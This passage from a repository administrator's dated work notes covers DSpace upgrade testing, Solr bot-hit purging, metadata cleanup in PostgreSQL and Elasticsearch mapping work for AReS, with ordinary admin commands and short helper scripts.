+	at org.hibernate.context.internal.ThreadLocalSessionContext$TransactionProtectionWrapper.invoke(ThreadLocalSessionContext.java:352)
+	at com.sun.proxy.$Proxy162.flush(Unknown Source)
+	at org.dspace.core.HibernateDBConnection.commit(HibernateDBConnection.java:83)
+	at org.dspace.core.Context.commit(Context.java:435)
+	at org.dspace.core.Context.complete(Context.java:380)
+	at org.dspace.administer.MetadataImporter.loadRegistry(MetadataImporter.java:164)
+	at org.dspace.storage.rdbms.DatabaseRegistryUpdater.updateRegistries(DatabaseRegistryUpdater.java:72)
+	at org.dspace.storage.rdbms.DatabaseRegistryUpdater.afterMigrate(DatabaseRegistryUpdater.java:121)
+	at org.flywaydb.core.internal.command.DbMigrate$3.doInTransaction(DbMigrate.java:250)
+	at org.flywaydb.core.internal.util.jdbc.TransactionTemplate.execute(TransactionTemplate.java:72)
+	at org.flywaydb.core.internal.command.DbMigrate.migrate(DbMigrate.java:246)
+	at org.flywaydb.core.Flyway$1.execute(Flyway.java:959)
+	at org.flywaydb.core.Flyway$1.execute(Flyway.java:917)
+	at org.flywaydb.core.Flyway.execute(Flyway.java:1373)
+	at org.flywaydb.core.Flyway.migrate(Flyway.java:917)
+	at org.dspace.storage.rdbms.DatabaseUtils.updateDatabase(DatabaseUtils.java:663)
+	at org.dspace.storage.rdbms.DatabaseUtils.updateDatabase(DatabaseUtils.java:575)
+	at org.dspace.storage.rdbms.DatabaseUtils.updateDatabase(DatabaseUtils.java:551)
+	at org.dspace.core.Context.<clinit>(Context.java:103)
+	at org.dspace.app.util.AbstractDSpaceWebapp.register(AbstractDSpaceWebapp.java:74)
+	at org.dspace.app.util.DSpaceWebappListener.contextInitialized(DSpaceWebappListener.java:31)
+	at org.apache.catalina.core.StandardContext.listenerStart(StandardContext.java:5197)
+	at org.apache.catalina.core.StandardContext.startInternal(StandardContext.java:5720)
+	at org.apache.catalina.util.LifecycleBase.start(LifecycleBase.java:183)
+	at org.apache.catalina.core.ContainerBase.addChildInternal(ContainerBase.java:1016)
+	at org.apache.catalina.core.ContainerBase.addChild(ContainerBase.java:992)
+
    +
  • I checked the database migrations with dspace database info and they were all OK +
      +
    • Then I restarted the Tomcat again and it started up OK…
    • +
    +
  • +
  • There were two issues I had reported to Atmire last month: +
      +
    • Importing items from the command line throws a NullPointerException from com.atmire.dspace.cua.CUASolrLoggerServiceImpl for every item, but the item still gets imported
    • +
    • No results for author name in Listing and Reports, despite there being hits in Discovery search
    • +
    +
  • +
  • To test the first one I imported a very simple CSV file with one item with minimal data +
      +
    • There is a new error now (but the item does get imported):
    • +
    +
  • +
+
$ dspace metadata-import -f /tmp/2020-10-06-import-test.csv -e aorth@mjanja.ch
+Loading @mire database changes for module MQM
+Changes have been processed
+-----------------------------------------------------------
+New item:
+ + New owning collection (10568/3): ILRI articles in journals
+ + Add    (dc.contributor.author): Orth, Alan
+ + Add    (dc.date.issued): 2020-09-01
+ + Add    (dc.title): Testing CUA import NPE
+
+1 item(s) will be changed
+
+Do you want to make these changes? [y/n] y
+-----------------------------------------------------------
+New item: aff5e78d-87c9-438d-94f8-1050b649961c (10568/108548)
+ + New owning collection  (10568/3): ILRI articles in journals
+ + Added   (dc.contributor.author): Orth, Alan
+ + Added   (dc.date.issued): 2020-09-01
+ + Added   (dc.title): Testing CUA import NPE
+Tue Oct 06 22:06:14 CEST 2020 | Query:containerItem:aff5e78d-87c9-438d-94f8-1050b649961c
+Error while updating
+org.apache.solr.client.solrj.impl.HttpSolrServer$RemoteSolrException: Expected mime type application/octet-stream but got text/html. <!doctype html><html lang="en"><head><title>HTTP Status 404 – Not Found</title><style type="text/css">body {font-family:Tahoma,Arial,sans-serif;} h1, h2, h3, b {color:white;background-color:#525D76;} h1 {font-size:22px;} h2 {font-size:16px;} h3 {font-size:14px;} p {font-size:12px;} a {color:black;} .line {height:1px;background-color:#525D76;border:none;}</style></head><body><h1>HTTP Status 404 – Not Found</h1><hr class="line" /><p><b>Type</b> Status Report</p><p><b>Message</b> The requested resource [/solr/update] is not available</p><p><b>Description</b> The origin server did not find a current representation for the target resource or is not willing to disclose that one exists.</p><hr class="line" /><h3>Apache Tomcat/7.0.104</h3></body></html>
+        at org.apache.solr.client.solrj.impl.HttpSolrServer.executeMethod(HttpSolrServer.java:512)
+        at org.apache.solr.client.solrj.impl.HttpSolrServer.request(HttpSolrServer.java:210)
+        at org.apache.solr.client.solrj.impl.HttpSolrServer.request(HttpSolrServer.java:206)
+        at org.apache.solr.client.solrj.request.AbstractUpdateRequest.process(AbstractUpdateRequest.java:124)
+        at org.apache.solr.client.solrj.SolrServer.commit(SolrServer.java:168)
+        at com.atmire.dspace.cua.CUASolrLoggerServiceImpl$5.visit(SourceFile:1131)
+        at com.atmire.dspace.cua.CUASolrLoggerServiceImpl.visitEachStatisticShard(SourceFile:212)
+        at com.atmire.dspace.cua.CUASolrLoggerServiceImpl.update(SourceFile:1104)
+        at com.atmire.dspace.cua.CUASolrLoggerServiceImpl.update(SourceFile:1093)
+        at org.dspace.statistics.StatisticsLoggingConsumer.consume(SourceFile:104)
+        at org.dspace.event.BasicDispatcher.consume(BasicDispatcher.java:177)
+        at org.dspace.event.BasicDispatcher.dispatch(BasicDispatcher.java:123)
+        at org.dspace.core.Context.dispatchEvents(Context.java:455)
+        at org.dspace.core.Context.commit(Context.java:424)
+        at org.dspace.core.Context.complete(Context.java:380)
+        at org.dspace.app.bulkedit.MetadataImport.main(MetadataImport.java:1399)
+        at sun.reflect.NativeMethodAccessorImpl.invoke0(Native Method)
+        at sun.reflect.NativeMethodAccessorImpl.invoke(NativeMethodAccessorImpl.java:62)
+        at sun.reflect.DelegatingMethodAccessorImpl.invoke(DelegatingMethodAccessorImpl.java:43)
+        at java.lang.reflect.Method.invoke(Method.java:498)
+        at org.dspace.app.launcher.ScriptLauncher.runOneCommand(ScriptLauncher.java:229)
+        at org.dspace.app.launcher.ScriptLauncher.main(ScriptLauncher.java:81)
+
    +
  • Also, I tested Listings and Reports and there are still no hits for “Orth, Alan” as a contributor, despite there being dozens of items in the repository and the Solr query generated by Listings and Reports actually returning hits:
  • +
+
2020-10-06 22:23:44,116 INFO org.apache.solr.core.SolrCore @ [search] webapp=/solr path=/select params={q=*:*&fl=handle,search.resourcetype,search.resourceid,search.uniqueid&start=0&fq=NOT(withdrawn:true)&fq=NOT(discoverable:false)&fq=search.resourcetype:2&fq=author_keyword:Orth,\+A.+OR+author_keyword:Orth,\+Alan&fq=dateIssued.year:[2013+TO+2021]&rows=500&wt=javabin&version=2} hits=18 status=0 QTime=10 
+
    +
  • Solr returns hits=18 for the L&R query, but there are no result shown in the L&R UI
  • +
  • I sent all this feedback to Atmire…
  • +
+

2020-10-07

+
    +
  • Udana from IWMI had asked about stats discrepancies in reports they had generated in previous months or years +
      +
    • I told him that we very often purge bots and the number of stats can change drastically
    • +
    • Also, I told him that it is not possible to compare stats from previous exports and that the stats should be taken with a grain of salt
    • +
    +
  • +
  • Testing POSTing items to the DSpace 6 REST API +
      +
    • We need to authenticate to get a JSESSIONID cookie first:
    • +
    +
  • +
+
$ http -f POST https://dspacetest.cgiar.org/rest/login email=aorth@fuuu.com 'password=fuuuu'
+$ http https://dspacetest.cgiar.org/rest/status Cookie:JSESSIONID=EABAC9EFF942028AA52DFDA16DBCAFDE
+
    +
  • Then we post an item in JSON format to /rest/collections/{uuid}/items:
  • +
+
$ http POST https://dspacetest.cgiar.org/rest/collections/f10ad667-2746-4705-8b16-4439abe61d22/items Cookie:JSESSIONID=EABAC9EFF942028AA52DFDA16DBCAFDE < item-object.json
+
    +
  • Format of JSON is:
  • +
+
{ "metadata": [
+    {
+      "key": "dc.title",
+      "value": "Testing REST API post",
+      "language": "en_US"
+    },
+    {
+      "key": "dc.contributor.author",
+      "value": "Orth, Alan",
+      "language": "en_US"
+    },
+    {
+      "key": "dc.date.issued",
+      "value": "2020-09-01",
+      "language": "en_US"
+    }
+  ],
+  "archived":"false",
+  "withdrawn":"false"
+}
+
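A sketch of scripting the same login and POST flow with requests (placeholder credentials and collection UUID); the session object keeps the JSESSIONID cookie automatically:

#!/usr/bin/env python3
# Log in to the DSpace 6 REST API, check the session, and POST an item to a
# collection (sketch; credentials and collection UUID are placeholders).
import requests

base = 'https://dspacetest.cgiar.org/rest'
session = requests.Session()

session.post(f'{base}/login', data={'email': 'aorth@fuuu.com', 'password': 'fuuuu'})
print(session.get(f'{base}/status').json())

item = {
    'metadata': [
        {'key': 'dc.title', 'value': 'Testing REST API post', 'language': 'en_US'},
        {'key': 'dc.contributor.author', 'value': 'Orth, Alan', 'language': 'en_US'},
        {'key': 'dc.date.issued', 'value': '2020-09-01', 'language': 'en_US'},
    ],
    'archived': 'false',
    'withdrawn': 'false',
}

response = session.post(f'{base}/collections/f10ad667-2746-4705-8b16-4439abe61d22/items', json=item)
print(response.status_code, response.json())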
    +
  • What is unclear to me is the archived parameter, it seems to do nothing… perhaps it is only used for the /items endpoint when printing information about an item +
      +
    • If I submit to a collection that has a workflow, even as a super admin and with “archived=false” in the JSON, the item enters the workflow (“Awaiting editor’s attention”)
    • +
    • If I submit to a new collection without a workflow the item gets archived immediately
    • +
    • I created some notes to share with Salem and Leroy for future reference when we start discussing POSTing items to the REST API
    • +
    +
  • +
  • I created an account for Salem on DSpace Test and added it to the submitters group of an ICARDA collection with no other workflow steps so we can see what happens +
      +
    • We are curious to see if he gets a UUID when posting from MEL
    • +
    +
  • +
  • I did some tests by adding his account to certain workflow steps and trying to POST the item
  • +
  • Member of collection “Submitters” step: +
      +
    • HTTP Status 401 – Unauthorized
    • +
    • The request has not been applied because it lacks valid authentication credentials for the target resource.
    • +
    +
  • +
  • Member of collection “Accept/Reject” step: +
      +
    • Same error…
    • +
    +
  • +
  • Member of collection “Accept/Reject/Edit Metadata” step: +
      +
    • Same error…
    • +
    +
  • +
  • Member of collection Administrators with no other workflow steps…: +
      +
    • Posts straight to archive
    • +
    +
  • +
  • Member of collection Administrators with empty “Accept/Reject/Edit Metadata” step: +
      +
    • Posts straight to archive
    • +
    +
  • +
  • Member of collection Administrators with populated “Accept/Reject/Edit Metadata” step: +
      +
    • Does not post straight to archive, goes to workflow
    • +
    +
  • +
  • Note that community administrators have no role in item submission other than being able to create/manage collection groups
  • +
+

2020-10-08

+
    +
  • I did some testing of the DSpace 5 REST API because Salem and I were curious +
      +
    • The authentication is a little different (uses a serialized JSON object instead of a form and the token is an HTTP header instead of a cookie):
    • +
    +
  • +
+
$ http POST http://localhost:8080/rest/login email=aorth@fuuu.com 'password=ddddd'
+$ http http://localhost:8080/rest/status rest-dspace-token:d846f138-75d3-47ba-9180-b88789a28099
+$ http POST http://localhost:8080/rest/collections/1549/items rest-dspace-token:d846f138-75d3-47ba-9180-b88789a28099 < item-object.json
+
    +
  • The item submission works exactly the same as in DSpace 6:
  • +
+
    +
  1. The submitting user must be a collection admin
  2. +
  3. If the collection has a workflow the item will enter it and the API returns an item ID
  4. +
  5. If the collection does not have a workflow then the item is committed to the archive and you get a Handle
  6. +
+

2020-10-09

+
    +
  • Skype with Peter about AReS and CGSpace +
      +
    • We discussed removing Atmire Listings and Reports from DSpace 6 because we can probably make the same reports in AReS and this module is the one that is currently holding us back from the upgrade
    • +
    • We discussed allowing partners to submit content via the REST API and perhaps making it an extra fee due to the burden it incurs with unfinished submissions, manual duplicate checking, developer support, etc
    • +
    • He was excited about the possibility of using my statistics API for more things on AReS as well as item view pages
    • +
    +
  • +
  • Also I fixed a bunch of the CRP mappings in the AReS value mapper and started a fresh re-indexing
  • +
+

2020-10-12

+
    +
  • Looking at CGSpace’s Solr statistics for 2020-09 and I see: +
      +
    • RTB website BOT: 212916
    • +
    • Java/1.8.0_66: 3122
    • +
    • Mozilla/5.0 (compatible; um-LN/1.0; mailto: techinfo@ubermetrics-technologies.com; Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1: 614
    • +
    • omgili/0.5 +http://omgili.com: 272
    • +
    • Mozilla/5.0 (compatible; TrendsmapResolver/0.1): 199
    • +
    • Vizzit: 160
    • +
    • Scoop.it: 151
    • +
    +
  • +
  • I’m confused because a pattern for bot has existed in the default DSpace spider agents file forever… +
      +
    • I see 259,000 hits in CGSpace’s 2020 Solr core when I search for this: userAgent:/.*[Bb][Oo][Tt].*/ +
        +
      • This includes 228,000 for RTB website BOT and 18,000 for ILRI Livestock Website Publications importer BOT
      • +
      +
    • +
    • I made a few requests to DSpace Test with the RTB user agent to see if it gets logged or not:
    • +
    +
  • +
+
$ http --print Hh https://dspacetest.cgiar.org/rest/bitstreams/dfa1d9c3-75d3-4380-a9d3-4c8cbbed2d21/retrieve User-Agent:"RTB website BOT"
+$ http --print Hh https://dspacetest.cgiar.org/rest/bitstreams/dfa1d9c3-75d3-4380-a9d3-4c8cbbed2d21/retrieve User-Agent:"RTB website BOT"
+$ http --print Hh https://dspacetest.cgiar.org/rest/bitstreams/dfa1d9c3-75d3-4380-a9d3-4c8cbbed2d21/retrieve User-Agent:"RTB website BOT"
+$ http --print Hh https://dspacetest.cgiar.org/rest/bitstreams/dfa1d9c3-75d3-4380-a9d3-4c8cbbed2d21/retrieve User-Agent:"RTB website BOT"
+
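To check whether those test requests actually get logged, one could count hits for the user agent directly in Solr; a minimal sketch (the core URL is the same local one used elsewhere in these notes, adjust for DSpace Test):

#!/usr/bin/env python3
# Count statistics hits recorded for a given user agent (sketch).
import requests

params = {
    'q': 'userAgent:"RTB website BOT"',
    'rows': 0,
    'wt': 'json',
}
response = requests.get('http://localhost:8083/solr/statistics/select', params=params)
print(response.json()['response']['numFound'])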
    +
  • After a few minutes I saw these four hits in Solr… WTF +
      +
    • So is there some issue with DSpace’s parsing of the spider agent files?
    • +
    • I added RTB website BOT to the ilri pattern file, restarted Tomcat, and made four more requests to the bitstream
    • +
    • These four requests were recorded in Solr too, WTF!
    • +
    • It seems like the patterns aren’t working at all…
    • +
    • I decided to try something drastic and removed all pattern files, adding only one single pattern bot to make sure this is not because of a syntax or precedence issue
    • +
    • Now even those four requests were recorded in Solr, WTF!
    • +
    • I will try one last thing, to put a single entry with the exact pattern RTB website BOT in a single spider agents pattern file…
    • +
    • Nope! Still records the hits… WTF
    • +
    • As a last resort I tried to use the vanilla DSpace 6 example file
    • +
    • And the hits still get recorded… WTF
    • +
    • So now I’m wondering if this is because of our custom Atmire shit?
    • +
    • I will have to test on a vanilla DSpace instance I guess before I can complain to the dspace-tech mailing list
    • +
    +
  • +
  • I re-factored the check-spider-hits.sh script to read patterns from a text file rather than sed’s stdout, and to properly search for spaces in patterns that use \s because Lucene’s search syntax doesn’t support it (and spaces work just fine) + +
  • +
  • I added [Ss]pider to the Tomcat Crawler Session Manager Valve regex because this can catch a few more generic bots and force them to use the same Tomcat JSESSIONID
  • +
  • I added a few of the patterns from above to our local agents list and ran the check-spider-hits.sh on CGSpace:
  • +
+
$ ./check-spider-hits.sh -f dspace/config/spiders/agents/ilri -s statistics -u http://localhost:8083/solr -p
+Purging 228916 hits from RTB website BOT in statistics
+Purging 18707 hits from ILRI Livestock Website Publications importer BOT in statistics
+Purging 2661 hits from ^Java\/[0-9]{1,2}.[0-9] in statistics
+Purging 199 hits from [Ss]pider in statistics
+Purging 2326 hits from ubermetrics in statistics
+Purging 888 hits from omgili\.com in statistics
+Purging 1888 hits from TrendsmapResolver in statistics
+Purging 3546 hits from Vizzit in statistics
+Purging 2127 hits from Scoop\.it in statistics
+
+Total number of bot hits purged: 261258
+$ ./check-spider-hits.sh -f dspace/config/spiders/agents/ilri -s statistics-2019 -u http://localhost:8083/solr -p
+Purging 2952 hits from TrendsmapResolver in statistics-2019
+Purging 4252 hits from Vizzit in statistics-2019
+Purging 2976 hits from Scoop\.it in statistics-2019
+
+Total number of bot hits purged: 10180
+$ ./check-spider-hits.sh -f dspace/config/spiders/agents/ilri -s statistics-2018 -u http://localhost:8083/solr -p
+Purging 1702 hits from TrendsmapResolver in statistics-2018
+Purging 1062 hits from Vizzit in statistics-2018
+Purging 920 hits from Scoop\.it in statistics-2018
+
+Total number of bot hits purged: 3684
+

2020-10-13

+
    +
  • Skype with Peter about AReS again +
      +
    • We decided to use Title Case for our countries on CGSpace to minimize the need for mapping on AReS
    • +
    • We did some work to add a dozen more mappings for strange and incorrect CRPs on AReS
    • +
    +
  • +
  • I can update the country metadata in PostgreSQL like this:
  • +
+
dspace=> BEGIN;
+dspace=> UPDATE metadatavalue SET text_value=INITCAP(text_value) WHERE resource_type_id=2 AND metadata_field_id=228;
+UPDATE 51756
+dspace=> COMMIT;
+
    +
  • I will need to pay special attention to Côte d’Ivoire, Bosnia and Herzegovina, and a few others though… maybe it’s better to do a search and replace using fix-metadata-values.csv +
      +
    • Export a list of distinct values from the database:
    • +
    +
  • +
+
dspace=> \COPY (SELECT DISTINCT(text_value) as "cg.coverage.country" FROM metadatavalue WHERE resource_type_id=2 AND metadata_field_id=228) TO /tmp/2020-10-13-countries.csv WITH CSV HEADER;
+COPY 195
+
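Before doing the corrections in OpenRefine, a small script could draft the title-cased values and flag likely corner cases for manual review; a sketch (the review heuristics are just examples):

#!/usr/bin/env python3
# Draft title-cased corrections for the exported country list and flag values
# that will need manual review (sketch; the heuristics are just examples).
import csv

with open('/tmp/2020-10-13-countries.csv', newline='') as infile, \
        open('/tmp/2020-10-13-countries-corrected.csv', 'w', newline='') as outfile:
    reader = csv.DictReader(infile)
    writer = csv.DictWriter(outfile, fieldnames=['cg.coverage.country', 'correct'])
    writer.writeheader()
    for row in reader:
        country = row['cg.coverage.country']
        correct = country.title()
        # Things like "Côte d'Ivoire", "Bosnia and Herzegovina", or "Timor-Leste"
        # don't follow simple title casing, so flag them for a manual check
        if "'" in correct or ' And ' in correct or '-' in correct:
            print(f'Check manually: {country} -> {correct}')
        writer.writerow({'cg.coverage.country': country, 'correct': correct})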
    +
  • Then use OpenRefine and make a new column for corrections, then use this GREL to convert to title case: value.toTitlecase() +
      +
    • I still had to double check everything to catch some corner cases (Andorra, Timor-leste, etc)
    • +
    +
  • +
  • For the input forms I found out how to do a complicated search and replace in vim:
  • +
+
:'<,'>s/\<\(pair\|displayed\|stored\|value\|AND\)\@!\(\w\)\(\w*\|\)\>/\u\2\L\3/g
+
    +
  • It uses a negative lookahead (aka “lookaround” in PCRE?) to match words that are not “pair”, “displayed”, etc because we don’t want to edit the XML tags themselves… +
      +
    • I had to fix a few manually after doing this, as above with PostgreSQL
    • +
    +
  • +
+

2020-10-14

+
    +
  • I discussed the title casing of countries with Abenet and she suggested we also apply title casing to regions +
      +
    • I exported the list of regions from the database:
    • +
    +
  • +
+
dspace=> \COPY (SELECT DISTINCT(text_value) as "cg.coverage.region" FROM metadatavalue WHERE resource_type_id=2 AND metadata_field_id=227) TO /tmp/2020-10-14-regions.csv WITH CSV HEADER;
+COPY 34
+
    +
  • I did the same as the countries in OpenRefine for the database values and in vim for the input forms
  • +
  • After testing the replacements locally I ran them on CGSpace:
  • +
+
$ ./fix-metadata-values.py -i /tmp/2020-10-13-CGSpace-countries.csv -db dspace -u dspace -p 'fuuu' -f cg.coverage.country -t 'correct' -m 228
+$ ./fix-metadata-values.py -i /tmp/2020-10-14-CGSpace-regions.csv -db dspace -u dspace -p 'fuuu' -f cg.coverage.region -t 'correct' -m 227
+
    +
  • Then I started a full re-indexing:
  • +
+
$ time chrt -b 0 ionice -c2 -n7 nice -n19 dspace index-discovery -b
+
+real    88m21.678s
+user    7m59.182s
+sys     2m22.713s
+
    +
  • I added a dozen or so more mappings to fix some country outliers on AReS +
      +
    • I will start a fresh harvest there once the Discovery update is done on CGSpace
    • +
    +
  • +
  • I also adjusted my fix-metadata-values.py and delete-metadata-values.py scripts to work on DSpace 6 where there is no more resource_type_id field +
      +
    • I will need to do it on a few more scripts as well, but I’ll do that after we migrate to DSpace 6 because those scripts are less important
    • +
    +
  • +
  • I found a new setting in DSpace 6’s usage-statistics.cfg about case insensitive matching of bots that defaults to false, so I enabled it in our DSpace 6 branch +
      +
    • I am curious to see if that resolves the strange issues I noticed yesterday about bot matching of patterns in the spider agents file completely not working
    • +
    +
  • +
+

2020-10-15

+
    +
  • Re-deploy latest code on both CGSpace and DSpace Test to get the input forms changes +
      +
    • Run system updates and reboot each server (linode18 and linode26)
    • +
    • I had to restart Tomcat seven times on CGSpace before all Solr stats cores came up OK
    • +
    +
  • +
  • Skype with Peter and Abenet about AReS and CGSpace +
      +
    • We agreed to lower case the AGROVOC subjects on CGSpace to make it harmonized with MELSpace and WorldFish
    • +
    • We agreed to separate the AGROVOC from the other center- and CRP-specific subjects so that the search and tag clouds are cleaner and more useful
    • +
    • We added a filter for journal title
    • +
    +
  • +
  • I enabled anonymous access to the “Export search metadata” option on DSpace Test +
      +
    • If I search for author containing “Orth, Alan” or “Orth Alan” the export search metadata returns HTTP 400
    • +
    • If I search for author containing “Orth” it exports a CSV properly…
    • +
    +
  • +
  • I created issues on the OpenRXV repository: + +
  • +
  • Atmire responded about the Listings and Reports and Content and Usage Statistics issues with DSpace 6 that I reported last week +
      +
    • They said that the CUA issue was a mistake and should be fixed in a minor version bump
    • +
    • They asked me to confirm if the L&R version bump from last week did not solve the issue there (which I had tested locally, but not on DSpace Test)
    • +
    • I will test them both again on DSpace Test and report back
    • +
    +
  • +
  • I posted a message on Yammer to inform all our users about the changes to countries, regions, and AGROVOC subjects
  • +
  • I modified all AGROVOC subjects to be lower case in PostgreSQL and then exported a list of the top 1500 to update the controlled vocabulary in our submission form:
  • +
+
dspace=> BEGIN;
+dspace=> UPDATE metadatavalue SET text_value=LOWER(text_value) WHERE resource_type_id=2 AND metadata_field_id=57;
+UPDATE 335063
+dspace=> COMMIT;
+dspace=> \COPY (SELECT DISTINCT text_value as "dc.subject", count(text_value) FROM metadatavalue WHERE resource_type_id=2 AND metadata_field_id=57 GROUP BY "dc.subject" ORDER BY count DESC LIMIT 1500) TO /tmp/2020-10-15-top-1500-agrovoc-subject.csv WITH CSV HEADER;
+COPY 1500
+
    +
  • Use my agrovoc-lookup.py script to validate subject terms against the AGROVOC REST API, extract matches with csvgrep, and then update and format the controlled vocabulary:
  • +
+
$ csvcut -c 1 /tmp/2020-10-15-top-1500-agrovoc-subject.csv | tail -n 1500 > /tmp/subjects.txt
+$ ./agrovoc-lookup.py -i /tmp/subjects.txt -o /tmp/subjects.csv -d
+$ csvgrep -c 4 -m 0 -i /tmp/subjects.csv | csvcut -c 1 | sed '1d' > dspace/config/controlled-vocabularies/dc-subject.xml
+# apply formatting in XML file
+$ tidy -xml -utf8 -iq -m -w 0 dspace/config/controlled-vocabularies/dc-subject.xml
+
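For spot-checking a single term, something like the following could query the AGROVOC web service directly; this is a sketch that assumes AGROVOC’s Skosmos instance exposes the standard /rest/v1/search endpoint at this base URL (the endpoint that agrovoc-lookup.py actually uses may differ):

#!/usr/bin/env python3
# Check whether a term exists in AGROVOC via the Skosmos REST API (sketch;
# the base URL is an assumption and may differ from agrovoc-lookup.py).
import requests

def in_agrovoc(term, lang='en'):
    response = requests.get(
        'https://agrovoc.fao.org/browse/rest/v1/search',
        params={'query': term, 'lang': lang},
    )
    return len(response.json()['results']) > 0

for term in ['maize', 'not-a-real-subject']:
    print(term, in_agrovoc(term))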
    +
  • Then I started a full re-indexing on CGSpace:
  • +
+
$ time chrt -b 0 ionice -c2 -n7 nice -n19 dspace index-discovery -b
+
+real    88m21.678s
+user    7m59.182s
+sys     2m22.713s
+

2020-10-18

+
    +
  • Macaroni Bros wrote to me to ask why some of their CCAFS harvesting is failing +
      +
    • They are scraping HTML from /browse responses like this:
    • +
    +
  • +
+

https://cgspace.cgiar.org/browse?type=crpsubject&value=Climate+Change%2C+Agriculture+and+Food+Security&XML&rpp=5000

+
    +
  • They are using the user agent “CCAFS Website Publications importer BOT” so they are getting rate limited by nginx
  • +
  • Ideally they would use the REST find-by-metadata-field endpoint, but it is really slow for large result sets (like twenty minutes!):
  • +
+
$ curl -f -H "CCAFS Website Publications importer BOT" -H "Content-Type: application/json" -X POST "https://dspacetest.cgiar.org/rest/items/find-by-metadata-field?limit=100" -d '{"key":"cg.contributor.crp", "value":"Climate Change, Agriculture and Food Security","language": "en_US"}'
+
    +
  • For now I will whitelist their user agent so that they can continue scraping /browse
  • +
  • I figured out that the mappings for AReS are stored in Elasticsearch +
      +
    • There is a Kibana interface running on port 5601 that can help explore the values in the index
    • +
    • I can interact with Elasticsearch by sending requests, for example to delete an item by its _id:
    • +
    +
  • +
+
$ curl -XPOST "localhost:9200/openrxv-values/_delete_by_query" -H 'Content-Type: application/json' -d'
+{
+  "query": {
+    "match": {
+      "_id": "64j_THMBiwiQ-PKfCSlI"
+    }
+  }
+}
+
    +
  • I added a new find/replace:
  • +
+
$ curl -XPOST "localhost:9200/openrxv-values/_doc?pretty" -H 'Content-Type: application/json' -d'
+{
+  "find": "ALAN1",
+  "replace": "ALAN2",
+}
+'
+
    +
  • I see it in Kibana, and I can search it in Elasticsearch, but I don’t see it in OpenRXV’s mapping values dashboard
  • +
  • Now I deleted everything in the openrxv-values index:
  • +
+
$ curl -XDELETE http://localhost:9200/openrxv-values
+
    +
  • Then I tried posting it again:
  • +
+
$ curl -XPOST "localhost:9200/openrxv-values/_doc?pretty" -H 'Content-Type: application/json' -d'
+{
+  "find": "ALAN1",
+  "replace": "ALAN2",
+}
+'
+
    +
  • But I still don’t see it in AReS
  • +
  • Interesting! I added a find/replace manually in AReS and now I see the one I POSTed…
  • +
  • I fixed a few bugs in the Simple and Extended PDF reports on AReS +
      +
    • Add missing ISI Journal and Type to Simple PDF report
    • +
    • Fix DOIs in Simple PDF report
    • +
    • Add missing “https://hdl.handle.net” to Handles in Extended PDF report
    • +
    +
  • +
  • Testing Atmire CUA and L&R based on their feedback from a few days ago +
      +
    • I no longer get the NullPointerException from CUA when importing metadata on the command line (!)
    • +
    • Listings and Reports now shows results for simple queries that I tested (!), though it seems that there are some new JavaScript libraries I need to allow in nginx
    • +
    +
  • +
  • I sent a mail to the dspace-tech mailing list asking about the error with DSpace 6’s “Export Search Metadata” function +
      +
    • If I search for an author like “Orth, Alan” it gives an HTTP 400, but if I search for “Orth” alone it exports a CSV
    • +
    • I replicated the same issue on demo.dspace.org
    • +
    +
  • +
+

2020-10-19

+
    +
  • Last night I learned how to POST mappings to Elasticsearch for AReS:
  • +
+
$ curl -XDELETE http://localhost:9200/openrxv-values
+$ curl -XPOST http://localhost:9200/openrxv-values/_doc/_bulk -H "Content-Type: application/json" --data-binary @./mapping.json
+
    +
  • The JSON file looks like this, with one instruction on each line:
  • +
+
{"index":{}}
+{ "find": "CRP on Dryland Systems - DS", "replace": "Dryland Systems" }
+{"index":{}}
+{ "find": "FISH", "replace": "Fish" }
+
    +
  • Adjust the report templates on AReS based on some of Peter’s feedback
  • +
  • I wrote a quick Python script to filter and convert the old AReS mappings to Elasticsearch’s Bulk API format:
  • +
+
#!/usr/bin/env python3
+
+import json
+import re
+
+f = open('/tmp/mapping.json', 'r')
+data = json.load(f)
+
+# Iterate over old mapping file, which is in format "find": "replace", ie:
+#
+#   "alan": "ALAN"
+#
+# And convert to proper dictionaries for import into Elasticsearch's Bulk API:
+#
+#   { "find": "alan", "replace": "ALAN" }
+#
+for find, replace in data.items():
+    # Skip all upper and all lower case strings because they are indicative of
+    # some AGROVOC or other mappings we no longer want to do
+    if find.isupper() or find.islower() or replace.isupper() or replace.islower():
+        continue
+
+    # Skip replacements with acronyms like:
+    #
+    #   International Livestock Research Institute - ILRI
+    #
+    acronym_pattern = re.compile(r"[A-Z]+$")
+    acronym_pattern_match = acronym_pattern.search(replace)
+    if acronym_pattern_match is not None:
+        continue
+
+    mapping = { "find": find, "replace": replace }
+
+    # Print command for Elasticsearch
+    print('{"index":{}}')
+    print(json.dumps(mapping))
+
+f.close()
+
    +
  • It filters all upper and lower case strings as well as any replacements that end in an acronym like “- ILRI”, reducing the number of mappings from around 4,000 to about 900
  • +
  • I deleted the existing openrxv-values Elasticsearch core and then POSTed it:
  • +
+
$ ./convert-mapping.py > /tmp/elastic-mappings.txt
+$ curl -XDELETE http://localhost:9200/openrxv-values
+$ curl -XPOST http://localhost:9200/openrxv-values/_doc/_bulk -H "Content-Type: application/json" --data-binary @/tmp/elastic-mappings.txt
+
    +
  • Then in AReS I didn’t see the mappings in the dashboard until I added a new one manually, after which they all appeared +
      +
    • I started a new harvesting
    • +
    +
  • +
  • I checked the CIMMYT DSpace repository and I see they have the REST API enabled +
      +
    • The data doesn’t look too bad actually: they have countries in title case, AGROVOC in upper case, CRPs, etc
    • +
    • According to their OAI they have 6,500 items in the repository
    • +
    • I would be interested to explore the possibility to harvest them…
    • +
    +
  • +
  • Bosede said they were having problems with the “Access” step during item submission +
      +
    • I looked at the Munin graphs for PostgreSQL and both connections and locks look normal so I’m not sure what it could be
    • +
    • I restarted the PostgreSQL service just to see if that would help
    • +
    • She said she was still experiencing the issue…
    • +
    +
  • +
  • I ran the dspace cleanup -v process on CGSpace and got an error:
  • +
+
Error: ERROR: update or delete on table "bitstream" violates foreign key constraint "bundle_primary_bitstream_id_fkey" on table "bundle"
+  Detail: Key (bitstream_id)=(192921) is still referenced from table "bundle".
+
    +
  • The solution is, as always:
  • +
+
$ psql -d dspace -U dspace -c 'update bundle set primary_bitstream_id=NULL where primary_bitstream_id in (192921);'
+UPDATE 1
+
    +
  • After looking at the CGSpace Solr stats for 2020-10 I found some hits to purge:
  • +
+
$ ./check-spider-hits.sh -f /tmp/agents -s statistics -u http://localhost:8083/solr -p
+
+Purging 2474 hits from ShortLinkTranslate in statistics
+Purging 2568 hits from RI\/1\.0 in statistics
+Purging 1851 hits from ILRI Livestock Website Publications importer BOT in statistics
+Purging 1282 hits from curl in statistics
+
+Total number of bot hits purged: 8174
